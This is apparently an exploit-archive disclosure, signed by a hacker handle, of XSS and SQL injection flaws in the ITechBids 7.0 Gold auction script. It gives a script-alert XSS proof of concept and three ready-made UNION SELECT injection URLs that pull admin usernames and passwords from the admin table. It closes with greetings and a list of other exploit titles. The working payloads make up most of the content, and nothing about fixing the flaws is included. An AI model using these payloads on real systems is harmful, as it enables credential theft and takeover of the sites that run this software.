######## ## ## ###### ######## ## ## ######## ######## ####### ########

## ### ## ## ## ## ## ## ## ## ## ## ## ## ## ##

## #### ## ## ## ## #### ## ## ## ## ## ##

###### ## ## ## ## ######## ## ######## ## ####### ## ##

## ## #### ## ## ## ## ## ## ## ## ##

## ## ### ## ## ## ## ## ## ## ## ## ## ##

######## ## ## ###### ## ## ## ## ## ####### ########

################################ !R4Q!4N H4CK3R ###################################

ITechBids 7.0 Gold Multiple Remote Vulnerabilities

Website : http://www.itechscripts.com

Founded By : Encrypt3d.M!nd

NOTE:I Didn't Search The Script Well,So Maybe There is other Vulnerabilities.

# 1- Cross-site scripting (XSS):

Affected File : forward_to_friend.php

PoC :

/forward_to_friend.php?productid=<script>alert(666);</script>

# 2-Remote Sql Injection(s) :

Affected File(s) :

sellers_othersitem.php

classifieds.php

shop.php

Note:There is Other Files Affected But I Couldn't Exploit Them :(

PoC:

/sellers_othersitem.php?seller_id=666666 union select 1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from admin

/classifieds.php?productid=666666 union select 1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from admin

/shop.php?id=666666 union select 1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from admin

# Greetz:

MY Sweet,L!0N,EL Mariachi,-=MizO=-(:-L),Shadow Administrator,

KoRn The Dog,Mini-Spider,All My Friends

The EnD :D

【ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities】相关文章：

★ VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnerability

★ tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities

★ LoveCMS 1.6.2 Final Update Settings Remote Exploit

★ Dana IRC 1.4a Remote Buffer Overflow Exploit

★ Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

★ Dreampics Builder (page) Remote SQL Injection Vulnerability

★ Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

★ HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities

★ AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

★ MFORUM 0.1a Arbitrary Add-Admin Vulnerability